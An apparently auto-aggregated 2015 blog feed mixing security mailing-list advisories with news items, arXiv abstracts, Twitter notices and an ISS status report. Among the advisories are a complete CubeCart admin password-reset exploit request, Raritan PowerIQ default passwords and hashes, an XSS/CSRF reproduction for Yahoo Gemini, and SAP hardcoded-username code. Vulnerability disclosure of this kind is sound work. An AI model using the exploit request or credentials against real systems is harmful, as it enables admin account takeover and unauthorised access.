Shopify online service web-application. Vulnerability Disclosure Timeline: ================================== 2015-07-05: Researcher Notification & Coordination (Hadji Samir) 2015-07-06: Vendor Notification (Security Team) 2015-09-03: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Affected Product(s): ==================== Yahoo! Product: Gemini Yahoo - Online Service (Web-Application) 2015 Q3 Exploitation Technique: ======================= Remote Severity Level: =============== Medium Technical Details & Description: ================================ A client-side cross site scripting web vulnerability has been discovered in the official Yahoo online service web-application. The vulnerability allows remote attacker to manipulate client-side web-application to browser request to compromise session data. The vulnerability is located in the rest_call_back of the vulnerable `/advertiser/ajax/bulkImportCampaigns` module POSt method request. Remote attackers with low privielege application user accounts are able to inject own malicious script code to compromise client-side app to browser requests. The request method to inject is POST and the attack vector is located on the client-side of the online-service. The security risk of the cross site web vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 3.8. Exploitation of the cross site scripting web vulnerability requires no privileged web application user account and no user interaction. Successful exploitation results in client-side account theft by hijacking, client-side phishing, client-side external redirects and non-persistent manipulation of affected or connected service modules. Request Method(s): [+] POST Vulnerable Module(s): [+] /advertiser/ajax/bulkImportCampaigns Proof of Concept (PoC): ======================= The client-side vulnerability can be exploited by remote attackers with low privilege web-application user account with low user interaction. For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue. Manual steps to reproduce the vulnerability ... 1. Create page csrf poc 2. The victim must login 3. When the victim will open the page the file csv will upload and creat new Campaigns Value Vulnerable: rest_call_back

Source: Gmail -> IFTTT-> Blogger

Hacker Demonstrated Untethered iOS 9 Jailbreak On Video

Good News for Jailbreakers! Just within 24 Hours after the launch of iOS 9 at Apple's Annual Event, a well-known iOS hacker has managed to untether jailbreak iOS 9. That's quite impressive. Believe it, iOS 9 has been Jailbroken! A reputed hacker 'iH8sn0w', who previously developed the popular jailbreak tools like Sn0wbreeze and P0sixspwn, published a new YouTube video last night,


from The Hacker News http://ift.tt/1i31O8x
via IFTTT

Anonymous Donor Offers Reward for Info in Mutilated Cat Case

The Auburn Star reported Thursday the $500 reward was posted by an anonymous donor for information leading to the arrest and conviction of ...

from Google Alert - anonymous http://ift.tt/1L66aaL
via IFTTT

Chung criticizes ruling on Asian support for Platini

SEOUL, South Korea (AP) FIFA presidential contender Chung Mong-joon has criticized election monitors who cleared the Asian Football Confederation of improperly supporting Michel Platini.

from FOX Sports Digital http://ift.tt/1UGB3II
via IFTTT

Lockpickers 3D-Printed Master Key for TSA Luggage Locks and BluePrint Leaked Online

Here're a good news and bad news for you. The good news is that if you lose the keys for your TSA-compliant "Travel Sentry" luggage locks then you can just 3D print your very own TSA master keys. The bad news is that anyone can now 3D print their own master keys to open your bags. Yes, the security of 300 Million TSA-approved Travel Sentry luggage locks has been compromised, and now


from The Hacker News http://ift.tt/1KclehS
via IFTTT

Jackson lends support to Australian team in wage fight

MELBOURNE, Australia (AP) Former WNBA Most Valuable Player Lauren Jackson has provided her support to Australia's women's soccer team in its fight with Football Federation Australia for increased wages.

from FOX Sports Digital http://ift.tt/1O50yiy
via IFTTT

I have a new follower on Twitter


Paolo Privitera
@Pick1 CEO Know Your Customers - Polyhedric Human Network Router & Serendipity Innovator - part of @StartupChile @500Startups @SingularityU @GalvanizeSF
San Francisco Venezia Santiago
http://t.co/VyULtzE1Hv
Following: 24070 - Followers: 33815

September 11, 2015 at 02:28AM via Twitter http://twitter.com/pppaolo

NGC 4372 and the Dark Doodad


The delightful Dark Doodad Nebula drifts through southern skies, a tantalizing target for binoculars in the constellation Musca, The Fly. The dusty cosmic cloud is seen against rich starfields just south of the prominent Coalsack Nebula and the Southern Cross. Stretching for about 3 degrees across this scene the Dark Doodad is punctuated at its southern tip (lower left) by globular star cluster NGC 4372. Of course NGC 4372 roams the halo of our Milky Way Galaxy, a background object some 20,000 light-years away and only by chance along our line-of-sight to the Dark Doodad. The Dark Doodad's well defined silhouette belongs to the Musca molecular cloud, but its better known alliterative moniker was first coined by astro-imager and writer Dennis di Cicco in 1986 while observing Comet Halley from the Australian outback. The Dark Doodad is around 700 light-years distant and over 30 light-years long. via NASA http://ift.tt/1K9sYRz

Thursday, September 10, 2015

I have a new follower on Twitter


Evgenij Renke
#StudentPartner @Microsoft #GER, #developer, #ITA
#Aachen
http://t.co/jdTmbGsu99
Following: 946 - Followers: 438

September 10, 2015 at 10:21PM via Twitter http://twitter.com/evgen1j

Coarse-to-Fine Sequential Monte Carlo for Probabilistic Programs. (arXiv:1509.02962v1 [cs.AI])

Many practical techniques for probabilistic inference require a sequence of distributions that interpolate between a tractable distribution and an intractable distribution of interest. Usually, the sequences used are simple, e.g., based on geometric averages between distributions. When models are expressed as probabilistic programs, the models themselves are highly structured objects that can be used to derive annealing sequences that are more sensitive to domain structure. We propose an algorithm for transforming probabilistic programs to coarse-to-fine programs which have the same marginal distribution as the original programs, but generate the data at increasing levels of detail, from coarse to fine. We apply this algorithm to an Ising model, its depth-from-disparity variation, and a factorial hidden Markov model. We show preliminary evidence that the use of coarse-to-fine models can make existing generic inference algorithms more efficient.



from cs.AI updates on arXiv.org http://ift.tt/1Q4VU1y
via IFTTT

Compatible Value Gradients for Reinforcement Learning of Continuous Deep Policies. (arXiv:1509.03005v1 [cs.LG])

This paper proposes GProp, a deep reinforcement learning algorithm for continuous policies with compatible function approximation. The algorithm is based on two innovations. Firstly, we present a temporal-difference based method for learning the gradient of the value-function. Secondly, we present the deviator-actor-critic (DAC) model, which comprises three neural networks that estimate the value function, its gradient, and determine the actor's policy respectively. We evaluate GProp on two challenging tasks: a contextual bandit problem constructed from nonparametric regression datasets that is designed to probe the ability of reinforcement learning algorithms to accurately estimate gradients; and the octopus arm, a challenging reinforcement learning benchmark. GProp is competitive with fully supervised methods on the bandit task and achieves the best performance to date on the octopus arm.



from cs.AI updates on arXiv.org http://ift.tt/1OgF7dK
via IFTTT

Recurrent Reinforcement Learning: A Hybrid Approach. (arXiv:1509.03044v1 [cs.LG])

Successful applications of reinforcement learning in real-world problems often require dealing with partially observable states. It is in general very challenging to construct and infer hidden states as they often depend on the agent's entire interaction history and may require substantial domain knowledge. In this work, we investigate a deep-learning approach to learning the representation of states in partially observable tasks, with minimal prior knowledge of the domain. In particular, we study reinforcement learning with deep neural networks, including RNN and LSTM, which are equipped with the desired property of being able to capture long-term dependency on history, and thus providing an effective way of learning the representation of hidden states. We further develop a hybrid approach that combines the strength of both supervised learning (for representing hidden states) and reinforcement learning (for optimizing control) with joint training. Extensive experiments based on a KDD Cup 1998 direct mailing campaign problem demonstrate the effectiveness and advantages of the proposed approach, which performs the best across the board.



from cs.AI updates on arXiv.org http://ift.tt/1Q4VUP8
via IFTTT

The World of Combinatorial Fuzzy Problems and the Efficiency of Fuzzy Approximation Algorithms. (arXiv:1509.03057v1 [cs.AI])

We re-examine a practical aspect of combinatorial fuzzy problems of various types, including search, counting, optimization, and decision problems. We are focused only on those fuzzy problems that take series of fuzzy input objects and produce fuzzy values. To solve such problems efficiently, we design fast fuzzy algorithms, which are modeled by polynomial-time deterministic fuzzy Turing machines equipped with read-only auxiliary tapes and write-only output tapes and also modeled by polynomial-size fuzzy circuits composed of fuzzy gates. We also introduce fuzzy proof verification systems to model the fuzzification of nondeterminism. Those models help us identify four complexity classes: Fuzzy-FPA of fuzzy functions, Fuzzy-PA and Fuzzy-NPA of fuzzy decision problems, and Fuzzy-NPAO of fuzzy optimization problems. Based on a relative approximation scheme targeting fuzzy membership degree, we formulate two notions of "reducibility" in order to compare the computational complexity of two fuzzy problems. These reducibility notions make it possible to locate the most difficult fuzzy problems in Fuzzy-NPA and in Fuzzy-NPAO.



from cs.AI updates on arXiv.org http://ift.tt/1OgF4P3
via IFTTT

Recurrent Neural Network Based Modeling of Gene Regulatory Network Using Bat Algorithm. (arXiv:1509.03221v1 [cs.AI])

Correct inference of genetic regulations inside a cell is one of the greatest challenges in post genomic era for the biologist and researchers. Several intelligent techniques and models were already proposed to identify the regulatory relations among genes from the biological database like time series microarray data. Recurrent Neural Network (RNN) is one of the most popular and simple approach to model the dynamics as well as to infer correct dependencies among genes. In this paper, Bat Algorithm (BA) was applied to optimize the model parameters of RNN model of Gene Regulatory Network (GRN). Initially the proposed method is tested against small artificial network without any noise and the efficiency was observed in term of number of iteration, number of population and BA optimization parameters. The model was also validated in presence of different level of random noise for the small artificial network and that proved its ability to infer the correct inferences in presence of noise like real world dataset. In the next phase of this research, BA based RNN is applied to real world benchmark time series microarray dataset of E. Coli. The results shown that it can able to identify the maximum true positive regulation but also include some false positive regulations. Therefore, BA is very suitable for identifying biological plausible GRN with the help RNN model



from cs.AI updates on arXiv.org http://ift.tt/1OgF7dI
via IFTTT

An Epsilon Hierarchical Fuzzy Twin Support Vector Regression. (arXiv:1509.03247v1 [cs.AI])

The research presents epsilon hierarchical fuzzy twin support vector regression based on epsilon fuzzy twin support vector regression and epsilon twin support vector regression. Epsilon FTSVR is achieved by incorporating trapezoidal fuzzy numbers to epsilon TSVR which takes care of uncertainty existing in forecasting problems. Epsilon FTSVR determines a pair of epsilon insensitive proximal functions by solving two related quadratic programming problems. The structural risk minimization principle is implemented by introducing regularization term in primal problems of epsilon FTSVR. This yields dual stable positive definite problems which improves regression performance. Epsilon FTSVR is then reformulated as epsilon HFTSVR consisting of a set of hierarchical layers each containing epsilon FTSVR. Experimental results on both synthetic and real datasets reveal that epsilon HFTSVR has remarkable generalization performance with minimum training time.



from cs.AI updates on arXiv.org http://ift.tt/1Q4VUyS
via IFTTT

Re: [FD] Schneider Electric CitectSCADA Insecure DLL Loading Code Execution Vulnerability

If I can write a file to "C:\Program Files", I already have administrative access to the machine. http://ift.tt/VBZnNp

Source: Gmail -> IFTTT-> Blogger

[FD] Nokia Solutions and Networks @vantage - Multiple Reflected XSS

Document Title: ============== Nokia Solutions and Networks @vantage - Multiple Reflected XSS Release Date: ============ 9 Sep 2015 Abstract Advisory Information: ============================= Ugur Cihan Koc discovered twentySeven Reflected XSS vulnerability in Nokia NSN @vantage Vulnerability Disclosure Timeline: ================================= 24 July 2015 Bug reported to the vendor. 28 July 2015 Asked about the case. 8 Sep 2015 End of support for this product, reported by the vendor Discovery Status: ================ Published Affected Product(s): =================== Nokia NSN @vantage Exploitation Technique: ====================== Local, Authenticated Severity Level: ============== Medium Technical Details & Description: =============================== Affected Path/Parameter[27] : /cftraces/filter/fl_copy.jsp idFilter nameFilter /cftraces/filter/fl_crea1.jsp flName /cftraces/process/pr_show_process.jsp serchStatus refreshTime serchNode /cftraces/session/se_crea.jsp MaxActivationTime NumberOfBytes NumberOfTracefiles SessionName serchSessionkind /cftraces/session/se_show.jsp serchSessionDescription /cftraces/session/tr_crea_filter.jsp serchApplication serchApplicationkind /cftraces/session/tr_create_tagg_para.jsp columKeyUnique columParameter componentName criteria1 criteria2 criteria3 description filter id pathName tableName component /home/certificate_association.jsp userid Proof of Concept (PoC): ====================== Proof of Concept http://ift.tt/1O4vwre Solution Fix & Patch: ==================== There aren't any fix for the issue. [End of Support] Security Risk: ============= The risk of the vulnerability above estimated as medium. Credits & Authors: ================= Ugur Cihan Koc(@_uceka_) Blog: www.uceka.com

Source: Gmail -> IFTTT-> Blogger

[FD] Defense in depth -- the Microsoft way (part 34): our developers and our QA still ignore our own security recommendations

[FD] DataTables Security Advisory - XSS Vulnerability - CVE-2015-6584

Information

Source: Gmail -> IFTTT-> Blogger

[FD] CubeCart 6.0.6 > 5.2.12 admin hijacking vulnerability

Application: CubeCart 6.0.6 > 5.2.12 Fixed: 07/09/2015 (6.0.7) Credits: Fernando Câmara @overflowy Title: Admin account hijacking vulnerability Dork: inurl:"index.php?_a=" Requirements: Default admin recovery functions enabled... Knowledge of the admin account email P.O.C Its possible for an attacker to access the admin pass recovery page without sending a recovery email previously. admin.php?_g=recovery The form asks us for a Validation Key , an Email and the new password. If a forgot password validation email is sent then the program saves the random generated key on the database on the admin user row. on the table CubeCart_admin_users Field: verify Type: varchar(32) Null: YES Default: NULL If a forgot password verification email is not sent then the default validation key according to the specified configuration of the field is NULL. If we input a space character (%20) the select query built in the function line 540 database.class.php will return results if the email is correct. The function at line 766 file database.class.php where() calls sqlSafe() declared in line 162 file mysql.class.php will quote our space character effectivly building a query with an empty string like this. SELECT admin_id,username WHERE email='admin@email.com' AND verify = ' '; -> an empty string The database recognizes the empty string as null. Just a simple request that would change an admin account password and redirect the attacker right to the control panel. POST /admin.php?_g=recovery HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:38.0) Gecko/20100101 Firefox/38.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://ift.tt/1O4uewo Cookie: PHPSESSID=lqc12qi1i5o5sl0jtbqt5747k7 Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 154 validate=%20&email=admin%40email.com &password%5Bnew%5D=newpass&password%5Bconfirm%5D=newpass&login=Submit&token=62a83c672e2763529b46fd8978ac9451

Source: Gmail -> IFTTT-> Blogger

[FD] [ERPSCAN-15-016] SAP NetWeaver – Hardcoded credentials

ERPSCAN Research Advisory [ERPSCAN-15-016] SAP NetWeaver – Hardcoded credentials Application: SAP NetWeaver Versions Affected: SAP NetWeaver AS ABAP, probably others Vendor URL: http://SAP.com Bugs: Hardcoded credentials Sent: 06.03.2014 Reported: 07.03.2014 Vendor response: 07.03.2014 Date of Public Advisory: 15.06.2015 Reference: SAP Security Note 2059659 Author: Rustem Gazizov, Diana Grigorieva (ERPScan) Description 1. ADVISORY INFORMATION Title: SAP NetWeaver AS ABAP – Hardcoded Credentials Advisory ID: [ERPSCAN-15-016] Risk: High Advisory URL: http://ift.tt/1O4ufQN Date published: 15.06.2015 Vendors contacted: SAP 2. VULNERABILITY INFORMATION Class: hardcoded credentials [CWE-798] Impact: read application data; gain privileges / assume identity Remotely Exploitable: Yes Locally Exploitable: No CVSS Information CVSS Base Score: 3.6 / 10 CVSS Base Vector: AV : Access Vector (Related exploit range) Network (N) AC : Access Complexity (Required attack complexity) High (H) Au : Authentication (Level of authentication needed to exploit) Single (S) C : Impact to Confidentiality Partial (P) I : Impact to Integrity Partial (P) A : Impact to Availability None (N) 3. VULNERABILITY DESCRIPTION The program code contains a hardcoded username that changes the system's behavior if the user is authenticated successfully. The user may obtain additional information that should not be displayed. 4. VULNERABLE PACKAGES SAP NetWeaver AS ABAP Other versions are probably affected too, but they were not checked. 5. SOLUTIONS AND WORKAROUNDS To correction this vulnerability, install SAP Security Note 2059659 6. AUTHOR Rustem Gazizov, Diana Grigorieva (ERPScan) 7. TECHNICAL DESCRIPTION An attacker can use hardcoded credentials to get unauthorized access and perform various actions in the system. In addition, it is likely that the code will be implemented into the system as a backdoor. The vulnerability is in the LSCT1I13 ABAP program. 61 * switch to adjust mode 62 WHEN 'XADJ'. 63 CLEAR GV_OK_CODE. 64 CALL FUNCTION 'TOCX_GET_SYSTEM_TYPE' IMPORTING SAP_SYSTEM = GS_DYN300-SAP_SYSTEM EXCEPTIONS OTHERS = 1. 65 66 IF GS_DYN300-SAP_SYSTEM = 'X' OR SY-UNAME = 'DDIC'. 67 IF GS_DYN300-ADJUST = ' '. 68 69 SELECT * FROM DD02L WHERE TABNAME = GS_DYN300-VIEW AND AS4LOCAL = 'A'. 8. REPORT TIMELINE Sent: 06.03.2014 Reported: 07.03.2014 Vendor response: 07.03.2014 Date of Public Advisory: 15.06.2015 9. REFERENCES http://ift.tt/1O4ufQN 10. ABOUT ERPScan Research The company’s expertise is based on the research subdivision of ERPScan, which is engaged in vulnerability research and analysis of critical enterprise applications. It has achieved multiple acknowledgments from the largest software vendors like SAP, Oracle, Microsoft, IBM, VMware, HP for discovering more than 400 vulnerabilities in their solutions (200 of them just in SAP!). ERPScan researchers are proud to have exposed new types of vulnerabilities (TOP 10 Web Hacking Techniques 2012) and to be nominated for the best server-side vulnerability at BlackHat 2013. ERPScan experts have been invited to speak, present, and train at 60+ prime international security conferences in 25+ countries across the continents. These include BlackHat, RSA, HITB, and private SAP trainings in several Fortune 2000 companies. ERPScan researchers lead the project EAS-SEC, which is focused on enterprise application security research and awareness. They have published 3 exhaustive annual award-winning surveys about SAP security. ERPScan experts have been interviewed by leading media resources and featured in specialized info-sec publications worldwide. These include Reuters, Yahoo, SC Magazine, The Register, CIO, PC World, DarkReading, Heise, and Chinabyte, to name a few. We have highly qualified experts in staff with experience in many different fields of security, from web applications and mobile/embedded to reverse engineering and ICS/SCADA systems, accumulating their experience to conduct the best SAP security research. 11. ABOUT ERPScan ERPScan is one of the most respected and credible Business Application Security providers. Founded in 2010, the company operates globally. Named an Emerging vendor in Security by CRN and distinguished by more than 25 other awards, ERPScan is the leading SAP SE partner in discovering and resolving security vulnerabilities. ERPScan consultants work with SAP SE in Walldorf to improve the security of their latest solutions. ERPScan’s primary mission is to close the gap between technical and business security. We provide solutions to secure ERP systems and business-critical applications from both cyber attacks and internal fraud. Our clients are usually large enterprises, Fortune 2000 companies, and managed service providers whose requirements are to actively monitor and manage the security of vast SAP landscapes on a global scale. Our flagship product is ERPScan Security Monitoring Suite for SAP. This multi award-winning innovative software is the only solution on the market certified by SAP SE covering all tiers of SAP security: vulnerability assessment, source code review, and Segregation of Duties. The largest companies from diverse industries like oil and gas, banking, retail, even nuclear power installations as well as consulting companies have successfully deployed the software. ERPScan Security Monitoring Suite for SAP is specifically designed for enterprises to continuously monitor changes in multiple SAP systems. It generates and analyzes trends in user friendly dashboards, manages risks, tasks, and can export results to external systems. These features enable central management of SAP system security with minimal time and effort. We follow the sun and function in two hubs located in the Netherlands and the US to operate local offices and partner network spanning 20+ countries around the globe. This enables monitoring cyber threats in real time and providing agile customer support. USA Address: 228 Hamilton Avenue, Fl. 3, Palo Alto, CA, 94301 Phone: 650.798.5255 Twitter: @erpscan Scoop-it: Business Application Security http://erpscan.com

Source: Gmail -> IFTTT-> Blogger

errors" for anonymous users

Seems like this problem keeps coming up in D6 when the cache is enabled... specifically for /user/register and /node/add. Clearing the cache fixes it, ...

from Google Alert - anonymous http://ift.tt/1FAjayW
via IFTTT

[FD] [ERPSCAN-15-015] SAP NetWeaver AS ABAP– Hardcoded Credentials

ERPSCAN Research Advisory [ERPSCAN-15-015] SAP NetWeaver AS ABAP– Hardcoded Credentials Application: SAP NetWeaver Versions Affected: SAP NetWeaver AS ABAP, probably others Vendor URL: http://SAP.com Bugs: Hardcoded credentials Sent: 06.03.2014 Reported: 07.03.2014 Vendor response: 07.03.2014 Date of Public Advisory: 15.06.2015 Reference: SAP Security Note 2057982 Author: Rustem Gazizov, Diana Grigorieva (ERPScan) Description 1. ADVISORY INFORMATION Title: SAP NetWeaver AS ABAP – Hardcoded Credentials Advisory ID: [ERPSCAN-15-015] Risk: High Advisory URL: http://ift.tt/1JiX1Zx Date published: 15.06.2015 Vendors contacted: SAP 2. VULNERABILITY INFORMATION Class: hardcoded credentials [CWE-798] Impact: read application data; gain privileges / assume identity Remotely Exploitable: Yes Locally Exploitable: No CVSS Information CVSS Base Score: 2.1 / 10 CVSS Base Vector: AV : Access Vector (Related exploit range) Network (N) AC : Access Complexity (Required attack complexity) High (H) Au : Authentication (Level of authentication needed to exploit) Single (S) C : Impact to Confidentiality Partial (P) I : Impact to Integrity None (N) A : Impact to Availability None (N) 3. VULNERABILITY DESCRIPTION The program code contains a hardcoded username that changes the system's behavior if the user is authenticated successfully. The user may obtain additional information that should not be displayed. 4. VULNERABLE PACKAGES SAP NetWeaver AS ABAP Other versions are probably affected too, but they were not checked. 5. SOLUTIONS AND WORKAROUNDS To correct this vulnerability, install SAP Security Note 2057982 6. AUTHOR Rustem Gazizov, Diana Grigorieva (ERPScan) 7. TECHNICAL DESCRIPTION An attacker can use hardcoded credentials to get unauthorized access and perform various actions in the system. In addition, it is likely that the code will be implemented into the system as a backdoor. The vulnerability is in the FKCDBFTRACE ABAP program. 14 APPEND &1. 15 ENDIF. 16 END-OF-DEFINITION. 17 18 DEFINE SWITCH_TRACE_ON. 19 MOVE 'IF SY-UNAME = ''SCHWABK''.' TO MKCD_LINE. 20 APPEND MKCD_LINE TO &1. 21 END-OF-DEFINITION. 22 8. REPORT TIMELINE Sent: 06.03.2014 Reported: 07.03.2014 Vendor response: 07.03.2014 Date of Public Advisory: 15.06.2015 9. REFERENCES http://ift.tt/1JiX1Zx 10. ABOUT ERPScan Research The company’s expertise is based on the research subdivision of ERPScan, which is engaged in vulnerability research and analysis of critical enterprise applications. It has achieved multiple acknowledgments from the largest software vendors like SAP, Oracle, Microsoft, IBM, VMware, HP for discovering more than 400 vulnerabilities in their solutions (200 of them just in SAP!). ERPScan researchers are proud to have exposed new types of vulnerabilities (TOP 10 Web Hacking Techniques 2012) and to be nominated for the best server-side vulnerability at BlackHat 2013. ERPScan experts have been invited to speak, present, and train at 60+ prime international security conferences in 25+ countries across the continents. These include BlackHat, RSA, HITB, and private SAP trainings in several Fortune 2000 companies. ERPScan researchers lead the project EAS-SEC, which is focused on enterprise application security research and awareness. They have published 3 exhaustive annual award-winning surveys about SAP security. ERPScan experts have been interviewed by leading media resources and featured in specialized info-sec publications worldwide. These include Reuters, Yahoo, SC Magazine, The Register, CIO, PC World, DarkReading, Heise, and Chinabyte, to name a few. We have highly qualified experts in staff with experience in many different fields of security, from web applications and mobile/embedded to reverse engineering and ICS/SCADA systems, accumulating their experience to conduct the best SAP security research. 11. ABOUT ERPScan ERPScan is one of the most respected and credible Business Application Security providers. Founded in 2010, the company operates globally. Named an Emerging vendor in Security by CRN and distinguished by more than 25 other awards, ERPScan is the leading SAP SE partner in discovering and resolving security vulnerabilities. ERPScan consultants work with SAP SE in Walldorf to improve the security of their latest solutions. ERPScan’s primary mission is to close the gap between technical and business security. We provide solutions to secure ERP systems and business-critical applications from both cyber attacks and internal fraud. Our clients are usually large enterprises, Fortune 2000 companies, and managed service providers whose requirements are to actively monitor and manage the security of vast SAP landscapes on a global scale. Our flagship product is ERPScan Security Monitoring Suite for SAP. This multi award-winning innovative software is the only solution on the market certified by SAP SE covering all tiers of SAP security: vulnerability assessment, source code review, and Segregation of Duties. The largest companies from diverse industries like oil and gas, banking, retail, even nuclear power installations as well as consulting companies have successfully deployed the software. ERPScan Security Monitoring Suite for SAP is specifically designed for enterprises to continuously monitor changes in multiple SAP systems. It generates and analyzes trends in user friendly dashboards, manages risks, tasks, and can export results to external systems. These features enable central management of SAP system security with minimal time and effort. We follow the sun and function in two hubs located in the Netherlands and the US to operate local offices and partner network spanning 20+ countries around the globe. This enables monitoring cyber threats in real time and providing agile customer support. USA Address: 228 Hamilton Avenue, Fl. 3, Palo Alto, CA, 94301 Phone: 650.798.5255 Twitter: @erpscan Scoop-it: Business Application Security http://erpscan.com

Source: Gmail -> IFTTT-> Blogger

[FD] [ERPSCAN-15-014] SAP Mobile Platform 3 – XXE in Add Repository

[FD] OpenLDAP ber_get_next Denial of Service

( , ) (, . '.' ) ('. ', ). , ('. ( ) ( (_,) .'), ) _ _, / _____/ / _ \ ____ ____ _____ \____ \==/ /_\ \ _/ ___\/ _ \ / \ / \/ | \\ \__( <_> ) Y Y \ /______ /\___|__ / \___ >____/|__|_| / \/ \/.-. \/ \/:wq (x.0) '=.|w|.=' _=''"''=. presents.. OpenLDAP get_ber_next Denial of Service Affected Versions: OpenLDAP <= 2.4.42 PDF: http://ift.tt/1EZRMzx

Source: Gmail -> IFTTT-> Blogger

[FD] Silver Peak VXOA Multiple Vulnerabilities

( , ) (, . '.' ) ('. ', ). , ('. ( ) ( (_,) .'), ) _ _, / _____/ / _ \ ____ ____ _____ \____ \==/ /_\ \ _/ ___\/ _ \ / \ / \/ | \\ \__( <_> ) Y Y \ /______ /\___|__ / \___ >____/|__|_| / \/ \/.-. \/ \/:wq (x.0) '=.|w|.=' _=''"''=. presents.. Silver Peak VXOA Multiple Vulnerabilities Affected versions: Silver Peak VX < 6.2.11 PDF: http://ift.tt/1M0saSN

Source: Gmail -> IFTTT-> Blogger

[FD] Raritan PowerIQ default credentials

Hello list, Raritan PowerIQ ships with a few default accounts and passwords/hashes. For the web interface, there are technically 3 default users. web_api:sl33p30F00dumass! epiq_api:raritan admin:raritan You can technically authenticate with the epiq_api user on the web interface and the PowerIQ API, but can't do anything (as far as I can tell). The web_api user seems disabled by default. The password hashes are salted and shasum'd with salts stored next to the passwords in the database. shasum("--salt--pass--") Some password hashes on the file system. $1$MKq.819X$xEoWD6Lu4vcGFmZvF8H.M. -- drag0n -- seems like a development/temp password $1$A0O1SyDL$NhsID.NJdZkkbh1SS4tXz/ $1$JoxiePCF$UxrFdjuBa351WSwC9coP7/ $1$lkaK891$wnnnDvFd3qpJ8H/MHZs.T1 -- drag0n -- seems like a development/temp password I have been unable to crack the two middle passwords, but these were taken from the setup configuration file and seem hardcoded.

Source: Gmail -> IFTTT-> Blogger

Blocking Authentication Attempts from Anonymous Networks

The Dark Web is a smaller subset that hides the IP addresses of the servers that run them, by using Tor or other anonymous networks. This Wired ...

from Google Alert - anonymous http://ift.tt/1iAymqX
via IFTTT

11 Million Ashley Madison Passwords Cracked In Just 10 Days

Last month, when hackers leaked nearly 100 gigabytes of sensitive data belonging to the popular online casual sex and marriage affair website 'Ashley Madison', there was at least one thing in favor of 37 Million cheaters that their Passwords were encrypted. But, the never ending saga of Ashley Madison hack could now definitely hit the cheaters hard, because a group of crazy Password


from The Hacker News http://ift.tt/1NkqtBc
via IFTTT

Combining data- and theory-driving insights using large, anonymous datasets of expressive online ...

Combining data- and theory-driving insights using large, anonymous datasets of expressive online behavior. Cambridge Big Data · Events · Events in ...

from Google Alert - anonymous http://ift.tt/1Qr78hW
via IFTTT

After FIFA scandals, proposals by FIFA reform adviser Scala

GENEVA (AP) Many have urged FIFA to change its ways. Few have succeeded.

from FOX Sports Digital http://ift.tt/1gce990
via IFTTT

Anonymous Report Form

If you want to report an assault, print out this Anonymous Report Form (PDF) for yourself or on behalf of someone you are helping, and bring it to ...

from Google Alert - anonymous http://ift.tt/1MehFy9
via IFTTT

I have a new follower on Twitter


aviation
home of aviation
sky

Following: 293 - Followers: 281

September 10, 2015 at 11:19AM via Twitter http://twitter.com/aviation_1

I have a new follower on Twitter


Ruth Brons
American String Teachers Association Kudos Award Recipient 2014 #BowHoldBuddies
Finally, an Instant Bow Hold!™
http://t.co/2FycMcaPYx
Following: 1029 - Followers: 5721

September 10, 2015 at 10:18AM via Twitter http://twitter.com/BowHoldBuddies

ISS Daily Summary Report – 09/9/15

Human Research Program (HRP) Operations: Microbiome: Kelly collected saliva samples in support of the Flight Day 180 (FD 180) Microbiome activities.  The Microbiome experiment investigates the impact of space travel on both the human immune system and an individual’s microbiome (the collection of microbes that live in and on the human body at any given time).   Salivary Markers: Yui collected saliva samples in support of his FD 90 Salivary Markers and inserted them into MELFI.  Salivary Markers samples will be used to measure markers of latent viral reactivation (a global indicator of immune impairment and infection risk) in conjunction with salivary antimicrobial proteins and immune cell functional assays. This research study will help identify if there are any risks of an adverse health event in crewmembers due to an impaired immune system. Maintaining a robust immune system during prolonged spaceflight missions (i.e., to other planets or asteroids) will be important to ensure mission success. If any impairment in immunity is found due to spaceflight, this will allow the development of appropriate countermeasures to help mitigate the risks.   Integrated Resistance and Aerobic Training Study (Sprint) Volume of Oxygen Utilized (VO2) Max: Yui performed his FD45 Sprint VO2 Max exercise session on the Cycle Ergometer with Vibration Isolation and Stabilization (CEVIS).  He donned Electrocardiogram (ECG) electrodes, Heart Rate Monitor (HRM) hardware, and performed Portable Pulmonary Function System (PPFS) calibrations then executed the VO2 protocol.  The Sprint investigation evaluates the use of high intensity, low volume exercise training to minimize loss of muscle, bone, and cardiovascular function in ISS crewmembers during long-duration missions. Upon completion of this study, investigators expect to provide an integrated resistance and aerobic exercise training protocol capable of maintaining muscle, bone and cardiovascular health while reducing total exercise time over the course of a long-duration space flight. This will provide valuable information in support of investigator’s long term goal of protecting human fitness for even longer space exploration missions.   JAXA-Small Satellite Orbital Deployer (SSOD) #4 Install: Kelly installed the J-SSOD#4 on the Slide Table with the Multi-Purpose Experiment Platform (MPEP) attached.  The J-SSOD #4 has two satellites that will be deployed next week.  The first satellite is designed to observe the Ultraviolet (UV) spectrum during the Orionid meteor shower in October.  The second satellite, sponsored by the University of Brasilia and the Brazilian government focuses on meteorological data collection.   Robonaut: Lindgren continued troubleshooting Robonaut’s Compact Peripheral Component Interface.  He unstowed and removed the softgoods from Robonaut, then accessed the internal workings to measure resistances and the CPCI Power supply.  Preliminary results are pointing to an issue with the Power Supply, and not the “brain stem”.  Future troubleshooting will likely include reseating the Power Supply to exonerate a connection issue.  Robonaut is a two-armed humanoid robot torso designed with the versatility and dexterity to manipulate hardware, work in high risk environments, and respond safely to unexpected obstacles. Robonaut is currently mounted inside the International Space Station (ISS); in the future, it will perform tasks both inside and outside the ISS.   Mobile Servicing System (MSS) Operations:  Last night, the Robotics Ground Controllers powered up the MSS and translated the Mobile Transporter (MT) from Worksite 7 (WS7) to WS5.  They then walked the Space Station Remote Manipulator System (SSRMS) off Mobile Base System (MBS) Power Data Grapple Fixture 4 (PDGF4) onto the Node 2 PDGF.  During the walkoff, the Robotics Ground Controllers performed Gear Box Limping (GBL) Commissioning Task 3 for Latching End Effector A (LEE-A).  Finally the Robotics Ground Controllers maneuvered the SSRMS to the H-II Transfer Vehicle 5 (HTV5) External Platform (EP) handoff position in preparation for next Tuesday’s EP installation into HTV5.   HTV Cargo Transfer Status:  Yui completed 1.5 hours yesterday of HTV cargo operations. Cargo specialist estimate the crew will need approximately 20 hours to complete the HTV-5 cargo operations.   ESA Short Duration Mission THOR: Cloud Turrets (CT’s) and Transient Luminous Events (TLE’s) targets have been refined for the upcoming 